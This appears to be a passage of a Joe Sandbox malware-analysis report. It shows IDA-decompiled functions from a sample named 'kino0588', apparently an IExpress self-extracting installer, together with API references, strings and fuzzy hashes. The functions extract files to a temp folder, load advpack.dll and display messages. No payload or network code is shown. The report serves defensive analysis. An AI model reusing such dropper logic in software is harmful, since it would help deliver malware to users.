				E00B81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
				_t26 = "advpack.dll";
				E00B8658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00B86CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}

0x00b86495
0x00b86495
0x00b864a0
0x00b864a7
0x00b864ab
0x00b864bd
0x00b864c2
0x00b864d3
0x00b864df
0x00b864e8
0x00b86502
0x00b864ee
0x00b864f9
0x00b864f9
0x00b86516

APIs

GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00B864DF
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00B864F9
LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00B86502

Strings

advpack.dll, xrefs: 00B864C2, 00B864CD, 00B86501
C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B864AC

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: LibraryLoad$AttributesFile
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
API String ID: 438848745-836797370
Opcode ID: 9bb84393ba8a61e789860eb3fed41d87ac21801d090f49886083808915de8512
Instruction ID: 85d4b6a96ed67101b4d1bcc1e2a00ed9e9d742064f8326c31e61c9b36a6e4c9d
Opcode Fuzzy Hash: 9bb84393ba8a61e789860eb3fed41d87ac21801d090f49886083808915de8512
Instruction Fuzzy Hash: 9101D670904108ABDB10FB64DC49AEE73B8DB60310F5001D5F585A31F0DF70AE86CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B828E8 Relevance: 7.6, APIs: 5, Instructions: 140
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00B82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00B82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00B82A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

0x00b828f1
0x00b828f4
0x00b828f7
0x00b828f9
0x00b828fc
0x00b828ff
0x00b82901
0x00b82907
0x00b82a62
0x00b82a64
0x00b8290d
0x00b8290d
0x00b8290f
0x00b82912
0x00b82920
0x00b82937
0x00000000
0x00000000
0x00b82944
0x00b8294a
0x00b8294f
0x00b82a2f
0x00b82a32
0x00b82a34
0x00b82a37
0x00b82a41
0x00000000
0x00000000
0x00b82955
0x00b8295e
0x00b82962
0x00b82969
0x00b8296f
0x00b82974
0x00b8298c
0x00b82a20
0x00b82a21
0x00b82a27
0x00b82a4c
0x00b82a4f
0x00b82a50
0x00b82a53
0x00b82a56
0x00b82a5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00b829b2
0x00b829b2
0x00b829b5
0x00b829bd
0x00b829c3
0x00b829cc
0x00b829d5
0x00b829d7
0x00b829da
0x00b829dd
0x00b829df
0x00b829ec
0x00b829f8
0x00b829fc
0x00b829ff
0x00b82a02
0x00b82a07
0x00b82a0a
0x00b82a0f
0x00b82a19
0x00b82a81
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b82a0f
0x00b8298c
0x00b82974
0x00b82962
0x00000000
0x00b8294f
0x00b82912
0x00b82a65
0x00b82a68
0x00b82a6c
0x00b82a6f
0x00b82a6f
0x00b82a7d

APIs

GlobalFree.KERNEL32 ref: 00B82A6F

Part of subcall function 00B82773: CharUpperA.USER32(FBC33AAB,00000000,00000000,00000000), ref: 00B827A8
Part of subcall function 00B82773: CharNextA.USER32(0000054D), ref: 00B827B5
Part of subcall function 00B82773: CharNextA.USER32(00000000), ref: 00B827BC
Part of subcall function 00B82773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B82829
Part of subcall function 00B82773: RegQueryValueExA.ADVAPI32(?,00B81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B82852
Part of subcall function 00B82773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B82870
Part of subcall function 00B82773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00B828A0

GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00B83938,?,?,?,?,-00000005), ref: 00B82958
GlobalLock.KERNEL32 ref: 00B82969
GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B83938,?,?,?,?,-00000005,?), ref: 00B82A21
GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00B82A81

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
String ID:
API String ID: 3949799724-0
Opcode ID: e10c6a4d250f142c3714a7b1c876fb9aac81b69417a0d49e2086a179ca67438b
Instruction ID: 1ed1346e14719e5377d488fcf7c7964026080fed55fcfd22112e10143220a68f
Opcode Fuzzy Hash: e10c6a4d250f142c3714a7b1c876fb9aac81b69417a0d49e2086a179ca67438b
Instruction Fuzzy Hash: 9E510931E00219DFDB25EF98D884AAEFBF5FF48700F1441AAE915E3221DB319941DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00B84169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00B84169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E00B8468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E00B8468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E00B844B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E00B844B9(0, 0x4b5, 0, 0, 0x10, 0);
			}

0x00b8417d
0x00b8418f
0x00b84193
0x00b841b7
0x00b841d3
0x00b841e6
0x00000000
0x00b841e7
0x00b841d5
0x00b841d6
0x00b841d8
0x00b841d9
0x00b841da
0x00b841df
0x00b841e1
0x00000000
0x00b841e1
0x00b841b9
0x00b841ba
0x00b841bc
0x00b841bd
0x00b841be
0x00000000
0x00b841be
0x00000000

APIs

Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846A0
Part of subcall function 00B8468F: SizeofResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846A9
Part of subcall function 00B8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00B846C3
Part of subcall function 00B8468F: LoadResource.KERNEL32(00000000,00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846CC
Part of subcall function 00B8468F: LockResource.KERNEL32(00000000,?,00B82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846D3
Part of subcall function 00B8468F: memcpy_s.MSVCRT ref: 00B846E5
Part of subcall function 00B8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00B846EF

LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00B830B4), ref: 00B84189
LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00B830B4), ref: 00B841E7

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Strings

FINISHMSG, xrefs: 00B84173, 00B841AB
<None>, xrefs: 00B841C5

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
String ID: <None>$FINISHMSG
API String ID: 3507850446-3091758298
Opcode ID: 93bb51e048c272753f16121a9c6c0e3d0bf979756f0efdbf2b90cb09cbf46a0b
Instruction ID: b2ba9f700508cf11ce2d3cfca8a3f3d51b93ef95b890d08a164037a47db8f592
Opcode Fuzzy Hash: 93bb51e048c272753f16121a9c6c0e3d0bf979756f0efdbf2b90cb09cbf46a0b
Instruction Fuzzy Hash: 4101ADB13002167BF32436694C8AF7B69CEDB95795F0040A6B705E22B09FA8DC01C379

Uniqueness

Uniqueness Score: -1.00%

Function 00B819E0 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
				signed int _v8;
				char _v520;
				void* __esi;
				signed int _t11;
				void* _t14;
				void* _t23;
				void* _t27;
				void* _t33;
				struct HWND__* _t34;
				signed int _t35;

				_t33 = __edi;
				_t27 = __ebx;
				_t11 =  *0xb88004; // 0xfbc33aab
				_v8 = _t11 ^ _t35;
				_t34 = _a4;
				_t14 = _a8 - 0x110;
				if(_t14 == 0) {
					_t32 = GetDesktopWindow();
					E00B843D0(_t34, _t15);
					_v520 = 0;
					LoadStringA( *0xb89a3c, _a16,  &_v520, 0x200);
					SetDlgItemTextA(_t34, 0x83f,  &_v520);
					MessageBeep(0xffffffff);
					goto L6;
				} else {
					if(_t14 != 1) {
						L4:
						_t23 = 0;
					} else {
						_t32 = _a12;
						if(_t32 - 0x83d > 1) {
							goto L4;
						} else {
							EndDialog(_t34, _t32);
							L6:
							_t23 = 1;
						}
					}
				}
				return E00B86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x00b819e0
0x00b819e0
0x00b819eb
0x00b819f2
0x00b819f9
0x00b819fc
0x00b81a01
0x00b81a2a
0x00b81a2e
0x00b81a3e
0x00b81a4f
0x00b81a62
0x00b81a6a
0x00000000
0x00b81a03
0x00b81a06
0x00b81a20
0x00b81a20
0x00b81a08
0x00b81a08
0x00b81a14
0x00000000
0x00b81a16
0x00b81a18
0x00b81a70
0x00b81a72
0x00b81a72
0x00b81a14
0x00b81a06
0x00b81a81

APIs

EndDialog.USER32(?,?), ref: 00B81A18
GetDesktopWindow.USER32 ref: 00B81A24
LoadStringA.USER32(?,?,00000200), ref: 00B81A4F
SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00B81A62
MessageBeep.USER32(000000FF), ref: 00B81A6A

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
String ID:
API String ID: 1273765764-0
Opcode ID: 35b13cb766d9e9e42d5a36a306f69ecb01ad2ffe92cba99f4d21c17f5b5ed190
Instruction ID: 806bcf2c4d7f1889366494794006cca6035aff21210f83a8e8e294dc7c992a6d
Opcode Fuzzy Hash: 35b13cb766d9e9e42d5a36a306f69ecb01ad2ffe92cba99f4d21c17f5b5ed190
Instruction Fuzzy Hash: 18118E3150110AABDB14FF68DD48AAE77F8EB4A700F1085A5E922A71B0DF309E11DB95

Uniqueness

Uniqueness Score: -1.00%

Function 00B87155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B87155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xb88004; // 0xfbc33aab
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xb88004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xb88004 = _t39;
				}
				_t37 =  !_t36;
				 *0xb88008 = _t37;
				return _t37;
			}

0x00b8715d
0x00b87161
0x00b87165
0x00b87178
0x00b87182
0x00b8718e
0x00b87197
0x00b871a0
0x00b871b1
0x00b871b8
0x00b871c4
0x00b871c7
0x00b871cb
0x00b871d5
0x00b871da
0x00b871da
0x00b871dc
0x00b871dc
0x00b871e2
0x00b871e5
0x00b871ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00B87182
GetCurrentProcessId.KERNEL32 ref: 00B87191
GetCurrentThreadId.KERNEL32 ref: 00B8719A
GetTickCount.KERNEL32 ref: 00B871A3
QueryPerformanceCounter.KERNEL32(?), ref: 00B871B8

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 360731dfbb134262bf160ef6c349cf556637a010914202c128b3939d445c2888
Instruction ID: 06546d4b8be7c2de625e271b8ba8f04b15e109651be3f899c4adcbdfe7cc810f
Opcode Fuzzy Hash: 360731dfbb134262bf160ef6c349cf556637a010914202c128b3939d445c2888
Instruction Fuzzy Hash: 70113A71D01208DBCB10EFB8DA4CA9EBBF4EF08314FA14896D901E7220EE309A04CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00B863C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				signed int _v8;
				char _v268;
				long _v272;
				void* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;

				_t15 =  *0xb88004; // 0xfbc33aab
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000;
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1;
				E00B81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP003.TMP\");
				E00B8658A( &_v268, 0x104, _a12);
				_t28 = 0;
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) {
					_t28 = _a4;
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0xb89124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0xb89124 = 0x80070052;
					_t37 = 0;
				}
				return E00B86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x00b863cb
0x00b863d2
0x00b863d8
0x00b863ea
0x00b863f3
0x00b86401
0x00b86402
0x00b86410
0x00b86415
0x00b86433
0x00b86438
0x00b86449
0x00b86463
0x00b8646d
0x00b86477
0x00b86477
0x00b8647a
0x00b8643a
0x00b8643a
0x00b86444
0x00b86444
0x00b86492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00B8642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00B8645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00B8647A

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B863EB

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 1065093856-2493987848
Opcode ID: 5d0842de7c870f9dd1590dfdb5c683c960bbdf214a1c58b88a1bfaeb530ad4bb
Instruction ID: d8c010b64e1d57b6955222fd85db2fd96b5cb0c42214b3c3af85e57c159a807c
Opcode Fuzzy Hash: 5d0842de7c870f9dd1590dfdb5c683c960bbdf214a1c58b88a1bfaeb530ad4bb
Instruction Fuzzy Hash: CE21C071A0021CABDB10EF65DCC5FEB73A8EB45314F0041AAA585A72A0DEB05D85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00B847E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B847E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E00B81680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0xb891e0; // 0x2ef8de8
						 *(_t34 + 4) = _t11;
						 *0xb891e0 = _t34;
						return 1;
					}
					_t25 =  *0xb88584; // 0x0
					E00B844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0xb88584; // 0x0
				E00B844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x00b847e8
0x00b847f0
0x00b847f4
0x00b8480f
0x00b84811
0x00b84814
0x00b84814
0x00b84816
0x00b84817
0x00b84829
0x00b8482b
0x00b8482f
0x00b8484f
0x00b84852
0x00b84855
0x00b84855
0x00b84857
0x00b84858
0x00b84860
0x00b84865
0x00b8486a
0x00b8486f
0x00000000
0x00b84876
0x00b84831
0x00b84841
0x00b84847
0x00b8480b
0x00000000
0x00b8480b
0x00b847f6
0x00b84806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00B84E6F), ref: 00B847EA
LocalAlloc.KERNEL32(00000040,?), ref: 00B84823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00B84847

Part of subcall function 00B844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00B84518
Part of subcall function 00B844B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00B84554

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00B84851

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 359063898-2493987848
Opcode ID: 5c9bb281bf7e7c7672a9b764623c5132dcf4cf9142f8c6ec5993f0d8ac5511ea
Instruction ID: 5ddbf97f025645c7441c3be2946c5031986d737cfce9ed421239f9802ce9a031
Opcode Fuzzy Hash: 5c9bb281bf7e7c7672a9b764623c5132dcf4cf9142f8c6ec5993f0d8ac5511ea
Instruction Fuzzy Hash: CE11E575604642AFEB14AF24AC58F773B9AEB85700B088599FA829B361DF35DC06C760

Uniqueness

Uniqueness Score: -1.00%

Function 00B83680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B83680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x00b8368c
0x00b8368f
0x00b83691
0x00b8369f
0x00b836a7
0x00000000
0x00000000
0x00b836ba
0x00000000
0x00b836bc
0x00b836bc
0x00b836c0
0x00b836cb
0x00b836c2
0x00b836c4
0x00b836c4
0x00b836da
0x00b836e0
0x00b836e6
0x00000000
0x00000000
0x00b836e6
0x00000000
0x00b836ba
0x00b836ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00B8369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B836B2
DispatchMessageA.USER32(?), ref: 00B836CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00B836DA

Memory Dump Source

Source File: 00000003.00000002.372270915.0000000000B81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000003.00000002.372266607.0000000000B80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372280591.0000000000B88000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.372286778.0000000000B8C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b80000_kino0588.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 7096679031b12e58c70bae353348b196376db696b07193588767e615b53e58d1
Instruction ID: ade9024a16c714f38aa5cb4629a5ebf4b0097f3caa28b0cd4f47407fa613203f
Opcode Fuzzy Hash: 7096679031b12e58c70bae353348b196376db696b07193588767e615b53e58d1
